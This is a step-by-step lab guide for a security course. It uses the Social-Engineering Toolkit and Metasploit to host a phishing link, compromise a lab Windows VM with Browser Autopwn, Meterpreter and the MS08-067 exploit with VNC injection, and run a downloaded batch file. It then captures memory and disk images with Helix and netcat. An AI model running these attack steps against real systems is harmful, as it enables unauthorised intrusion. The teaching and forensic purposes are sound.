
Hands-on Guide - Social Engineering Toolkit (SET): Lesson 3

{ Create Malicious Weblink, Install Virus, Capture Forensic Images }

Section 0. Background Information
  • What is the Social-Engineering Toolkit (SET)
    • The Social-Engineering Toolkit (SET) is a Python-driven suite of custom tools which focuses solely on attacking the human element of penetration testing.
    • Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
    • The Social-Engineering Toolkit is available on BackTrack (e.g. BackTrack 5), BackBox, Blackbuntu, GnackTrack and other Linux distributions used for penetration testing.
  • Lab Notes
    • In this lab we will do the following:
      1. Use SET to Create a Malicious Web Link
      2. Create an additional VNC Session
      3. Install a Fake Virus
      4. Capture a Forensic Memory and Hard Disk Image.
  • Legal Disclaimer: These labs are for use in a learning environment only; do not test against systems you are not authorized to test.
Section 1. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Programs --> VMWare --> VMWare Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

Section 2. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME
    • Instructions:
      1. Type startx

Section 3. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

Section 4. Start the Social Engineering ToolKit
  1. Start Social Engineering ToolKit
    • Instructions:
      1. cd /pentest/exploits/set
      2. ./set
  2. Website Attack Vector
    • Instructions:
      1. Select 2
  3. Select Metasploit Browser Attack Method
    • Instructions:
      1. Select 2
  4. Select Web Templates
    • Instructions:
      1. Select 1
  5. Set Facebook Web Attack
    • Instructions:
      1. Select 4
  6. Enter Exploit
    • Instructions:
      1. 24) Metasploit Browser Autopwn (USE AT OWN RISK!)
  7. Set Payload
    • Instructions:
      1. Select 2) Windows Reverse_TCP Meterpreter
      2. Use Port 5555
  8. Exploits Prepared, Server Started
    • Instructions:
      1. You are looking for the "--- Done, Found" line before you continue.
      2. Continue to next Section.
Section 5. Start Up Windows Machine
  • Social Engineering Note
    • Imagine how an attacker could embed the malicious link created in the previous Section in an email to a potential victim.
    • This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize the Metasploit payload was injected and a session is now attached to a migrated notepad process.
  1. Booting up WindowsVulnerable01
    • Instructions:
      1. Start up VMware Player
      2. Select WindowsVulnerable01
      3. Edit Virtual Machine
  2. Configuring the Network Adapter
    • Instructions:
      1. Select Network Adapter
      2. Select Bridged Connection
      3. Select OK
  3. Play WindowsVulnerable01
    • Instructions:
      1. Select Play virtual Machine
  4. WindowsVulnerable01 Authentication
    • Instructions:
      1. Login as administrator

Section 6. Start Up a Web Browser
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer
  2. Victim Clicks on Link
    • Instructions:
      1. Place the Malicious Web Link in the Address Bar.
        • In my case, http://192.168.1.105:8080
        • In your case, get the IP address from Section 4, Step 8.
    • Note:
      • The Web Browser will just crash.

Section 7. Entering the Victim's Machine
  1. Record Victim's IP Address
    • Instructions:
      1. Record the Victim's IP Address.
      2. Look for the line that starts with Session ID 1 (See Below).
  2. Create VNC Session to Victim's machine
    • Instructions:
      1. use windows/smb/ms08_067_netapi
      2. set PAYLOAD windows/vncinject/bind_tcp
      3. set RHOST 192.168.1.109
        • Note: This is the IP Address obtained in the previous step.
      4. exploit
  3. Viewing the Victim's Machine over VNC
    • Instructions:
      1. Now you have a VNC connection to the Victim's Machine.
      2. Pretty KooL right!!!
    • Proof of Lab Instructions #1:
      1. Click in the Metasploit Courtesy Shell
      2. date, press enter twice
      3. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
      4. PrtScn
      5. Paste into a word document
      6. Continue to Next Step
  4. Bring Up Internet Explorer
    • Instructions:
      1. Start --> Internet Explorer
  5. Download Fake Virus.
    • Instructions:
      1. Place "http://www.antoanthongtin.edu.vn/UNIX/BACKTRACK/lesson6/fake_virus.bat" into the address bar.
      2. Press Enter
      3. Click Save
      4. Continue to Next Step
  6. Save the Fake Virus.
    • Instructions:
      1. Navigate to "C:\tools\Virus Jar"
        • Create this directory if it does not already exist.
      2. Click Save
  7. Run the Fake Virus.
    • Instructions:
      1. Click the Run Button
  8. Viewing Results
    • Instructions:
      1. You will now see some messages stating your system was compromised.
        • Note, this is just a batch script that prints messages to a screen.
        • This was just an example of what an attacker could do once they compromised the victim's machine.
      2. Click on the Black Box and Press Enter.
  9. Delete the fake_virus.bat file
    • Instructions:
      1. Start --> My Computer
      2. Navigate to "C:\tools\Virus Jar"
      3. Right Click on fake_virus.bat
      4. Click Delete
      5. Send to Recycle Bin? Yes
  10. Delete the fake_virus.bat file from the Recycle Bin
    • Instructions:
      1. Navigate to the Recycle Bin
      2. Right Click on fake_virus.bat
      3. Click Delete
      4. Are you sure want to delete 'fake_virus.bat'? Yes
    • Notes:
      • We are completely removing this file, so that we have a deleted file to both analyze and recover in subsequent forensic labs.

Section 8. Start Up NetCat Listener To Receive Physical Memory Dump From Helix
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.
     
  3. Start Up Netcat on BackTrack
    • Instructions:
      1. mkdir -p /FORENSICS/images/1/
      2. cd /FORENSICS/images/1/
      3. nc -l -vvv -p 8888 > WV01_PM_fake_virus.dd
        • Netcat will listen for Helix to send the Memory Image.
        • Nothing will be sent until you complete the following section.
      4. Continue to Next Section

Section 9. Start Helix to Send Physical Memory to BackTrack
  1. Edit Virtual Machine Settings
    • Instructions:
      1. Virtual Machine --> Virtual Machine Settings...
  2. Configure Windows to load the Helix iso as a CD/DVD
    • Instructions
      1. Select CD/DVD (IDE)
      2. Select the Use ISO image file
      3. Browse to where you saved the Helix iso.
        • Note: In my case, I saved it in the following location:
        • H:\BOOT ISO\Helix2008R1.iso
  3. Helix Screen
    • Instructions
      1. Select Accept
  4. Live Acquisition
    • Instructions
      1. Click on the Camera Icon.
      2. Select "\\PhysicalMemory" from the Source Dropdown Menu
      3. Select the NetCat Radio Button
      4. Destination IP: Provide BackTrack's IP Address.
        • Obtain BackTrack's IP in Section 8, Step 2.
        • In my case, it is 192.168.1.105.
        • In your case, it will be different.
      5. Port: 8888
        • This is the Listening NetCat Port on the BackTrack Server.
      6. Click Acquire
  5. Notice
    • Instructions
      1. Click Yes
  6. Helix Informational
    • Instructions
      1. You will see a black command prompt like below.
      2. Notice it will say "Copying Physical memory"
      3. DO NOT CONTINUE TO THE NEXT SECTION UNTIL the black box disappears

Section 10. Verify Physical Memory Dump on BackTrack
  1. Verify Image Byte Size
    • Instructions:
      1. ls -l WV01_PM_fake_virus.dd

Section 11. Start Up NetCat Listener To Receive Hard Drive Image From Helix
  1. Start Up Netcat on BackTrack
    • Instructions:
      1. cd /FORENSICS/images/1/
      2. nc -l -vvv -p 8888 > WV01_HD_fake_virus.dd
        • Netcat will listen for Helix to send the Hard Drive Image.
        • Nothing will be sent until you complete the following section.
      3. Continue to Next Section

Section 12. Use Helix to Send Hard Disk Image to BackTrack
  1. Live Acquisition
    • Instructions:
      1. Click on the Camera Icon.
      2. Select "C:\ (Logical drive)" from the Source Dropdown Menu
      3. Select the NetCat Radio Button
      4. Destination IP: Provide BackTrack's IP Address.
        • Obtain BackTrack's IP in Section 8, Step 2.
        • In my case, it is 192.168.1.105.
        • In your case, it will be different.
      5. Port: 8888
        • This is the Listening NetCat Port on the BackTrack Server.
      6. Click Acquire
  2. Notice
    • Instructions
      1. Click Yes
  3. Helix Informational
    • Instructions
      1. You will see a black command prompt like below.
      2. Notice it will say "Copying \\.\C to CONOUT$..."
      3. This 8GB copy will take about 30 minutes.
      4. DO NOT CONTINUE TO THE NEXT SECTION UNTIL the black box disappears

Section 13. Verify Hard Drive Image on BackTrack
  1. Verify Image Byte Size
    • Instructions:
      1. ls -l WV01*
      2. date
      3. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions #2:
      1. PrtScn
      2. Paste into the previously created word document
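The size checks in Sections 10 and 13 can be turned into a repeatable verification step. The POSIX shell script below is an added example, not part of the original lab, Helix or netcat: it confirms the image netcat wrote is non-empty and (optionally) the expected byte size, records its SHA-256 in a manifest that `sha256sum -c` can re-check, and logs the acquisition time. The function names, the manifest layout and the 4 KiB demo file are constructed for the example; in the lab you would point it at /FORENSICS/images/1/WV01_*.dd.

```shell
#!/bin/sh
# Added example, not part of the original lab: once Helix has streamed an image
# into the netcat listener, confirm the file is complete and record its SHA-256
# so later analysis can show the evidence was not altered after acquisition.
# The demo at the bottom uses a constructed 4 KiB file, not a real image.
set -eu

# verify_image IMAGE [EXPECTED_BYTES]
# Checks that the image exists and is non-empty; if the acquisition tool
# reported a size (e.g. the VM's physical RAM), also checks the byte count.
# A short file usually means the listener was closed before Helix finished.
verify_image() {
    img="$1"; expected="${2:-}"
    if [ ! -s "$img" ]; then
        echo "FAIL: $img is missing or empty"; return 1
    fi
    actual=$(wc -c < "$img" | tr -d ' ')
    if [ -n "$expected" ] && [ "$actual" -ne "$expected" ]; then
        echo "FAIL: $img is $actual bytes, expected $expected"; return 1
    fi
    echo "OK: $img is $actual bytes"
}

# record_hash IMAGE MANIFEST
# Appends "<sha256>  <image>" to the manifest (the format sha256sum -c reads)
# and logs the UTC acquisition time and size beside it; prints the hash.
record_hash() {
    img="$1"; manifest="$2"
    sum=$(sha256sum "$img" | cut -d' ' -f1)
    printf '%s  %s\n' "$sum" "$img" >> "$manifest"
    printf '%s  %s  %s bytes\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$img" \
        "$(wc -c < "$img" | tr -d ' ')" >> "$manifest.log"
    echo "$sum"
}

# check_manifest MANIFEST
# Re-hashes every image listed; non-zero status if any image has changed.
check_manifest() {
    sha256sum -c "$1"
}

# Demo with a constructed image (in the lab: /FORENSICS/images/1/WV01_*.dd).
demo_dir=$(mktemp -d)
dd if=/dev/zero bs=1024 count=4 of="$demo_dir/WV01_demo.dd" 2>/dev/null
verify_image "$demo_dir/WV01_demo.dd" 4096
record_hash "$demo_dir/WV01_demo.dd" "$demo_dir/manifest.sha256"
check_manifest "$demo_dir/manifest.sha256"
rm -rf "$demo_dir"
```

Run `check_manifest` again before each analysis session; a mismatch means the image, not the evidence, must be questioned.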
